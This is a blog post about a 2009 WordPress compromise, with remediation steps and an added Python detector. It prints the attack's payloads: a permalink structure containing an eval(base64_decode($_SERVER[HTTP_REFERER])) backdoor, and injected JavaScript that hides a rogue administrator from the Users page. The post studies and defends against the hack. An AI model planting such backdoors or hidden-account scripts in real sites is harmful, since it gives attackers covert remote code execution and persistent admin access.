WordPress Code At The End Of URLs, Hack?

permalink

http://blog.watashii.com/2009/09/05/wordpress-code-at-the-end-of-urls-hack/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Possibly a new WordPress hack happening at the moment? I just got this weird code appended to the end of every URL on my WordPress blog. It is caused by the Permalink Settings having been changed to a custom structure. To revert it, go to [Dashboard > Settings > Permalink] and change the Custom Structure back to your original default option.

I've also noticed there are a few more users (a new Administrator and a bunch of Subscribers) being added by this hack [Dashboard > Users]. You may also notice the new administrator user is hidden from display. What I did was to view the page source to pull their User ID. Then I edited this user to demote it to a subscriber (http://your_blog_url/wp-admin/user-edit.php?user_id=XXX) and renamed their javascripted first name. Thereafter I deleted these extra subscribers.

Also, I upgraded from WP 2.7 to the latest version, 2.8.4.

Follow the discussion here.

…
<div id="user_superuser"><script language="JavaScript">
// Injected into the rogue administrator's first-name field; it runs when the Users page loads.
var setUserName = function(){
    try{
        // Walk up from the injected div to the enclosing table row and remove it,
        // so the account never shows in the user list.
        var t=document.getElementById("user_superuser");
        while(t.nodeName!="TR"){
            t=t.parentNode;
        };
        t.parentNode.removeChild(t);
        // Decrement the "N shown below" count in the page headings.
        var tags = document.getElementsByTagName("H3");
        var s = " shown below";
        for (var i = 0; i < tags.length; i++) {
            var t=tags[i].innerHTML;
            var h=tags[i];
            if(t.indexOf(s)>0){
                s =(parseInt(t)-1)+s;
                h.removeChild(h.firstChild);
                t = document.createTextNode(s);
                h.appendChild(t);
            }
        }
        // Decrement the "Administrator (N)" count in the role filter links.
        var arr=document.getElementsByTagName("ul");
        for(var i in arr) if(arr[i].className=="subsubsub"){
            var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
            if(n[1]>0){
                var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
                arr[i].innerHTML=txt;
            }
        }
    }catch(e){};
};
addLoadEvent(setUserName);
</script></div>
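Added here as an example, not code from the post: a small Python check for the two indicators described above. It URL-decodes a permalink_structure value and flags PHP code constructs or unknown %tags%, and it scans the saved page source of the Users screen for rows that carry inline script, which is how the rogue administrator above stays hidden. The `<tr id="user-N">` row markup is an assumption about the WordPress admin page, and the sample inputs are constructed.

```python
import re
from urllib.parse import unquote

# Tags WordPress documents for custom permalink structures; anything else inside %...% is not a rewrite tag.
KNOWN_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
              "post_id", "postname", "category", "author"}
# PHP constructs that have no business in a permalink structure.
CODE_LIKE = re.compile(r"\$\{|\beval\s*\(|base64_decode\s*\(|\$_(SERVER|GET|POST|REQUEST|COOKIE)\b", re.I)

def check_permalink_structure(structure):
    """Return findings for a permalink_structure value (URL-encoded or not); empty list means clean."""
    structure = unquote(structure)
    findings = []
    if CODE_LIKE.search(structure):
        findings.append("code-like content in permalink structure")
    for tag in re.findall(r"%([^%]+)%", structure):
        if tag not in KNOWN_TAGS:
            findings.append("unknown permalink tag: %" + tag + "%")
    return findings

# Assumption: rows on the admin Users page look like <tr id="user-ID">...</tr>.
ROW = re.compile(r'<tr[^>]*\bid=["\']user-(\d+)["\'][^>]*>(.*?)</tr>', re.I | re.S)

def hidden_user_ids(users_page_html):
    """IDs of user rows whose cells carry inline script, the trick used to hide the rogue admin."""
    return [int(uid) for uid, body in ROW.findall(users_page_html)
            if re.search(r"<script\b", body, re.I)]

# Constructed samples: the structure seen in the post's URL, a clean one, and a two-row users list.
HACKED_STRUCTURE = "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/"
CLEAN_STRUCTURE = "/%year%/%monthnum%/%postname%/"
USERS_HTML = (
    '<tr id="user-1"><td>admin</td><td>Site Owner</td></tr>'
    '<tr id="user-7"><td>superuser</td><td><div id="user_superuser">'
    '<script>var setUserName=function(){};</script></div></td></tr>'
)

if __name__ == "__main__":
    print(check_permalink_structure(HACKED_STRUCTURE))  # two findings
    print(check_permalink_structure(CLEAN_STRUCTURE))   # []
    print(hidden_user_ids(USERS_HTML))                  # [7]
```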
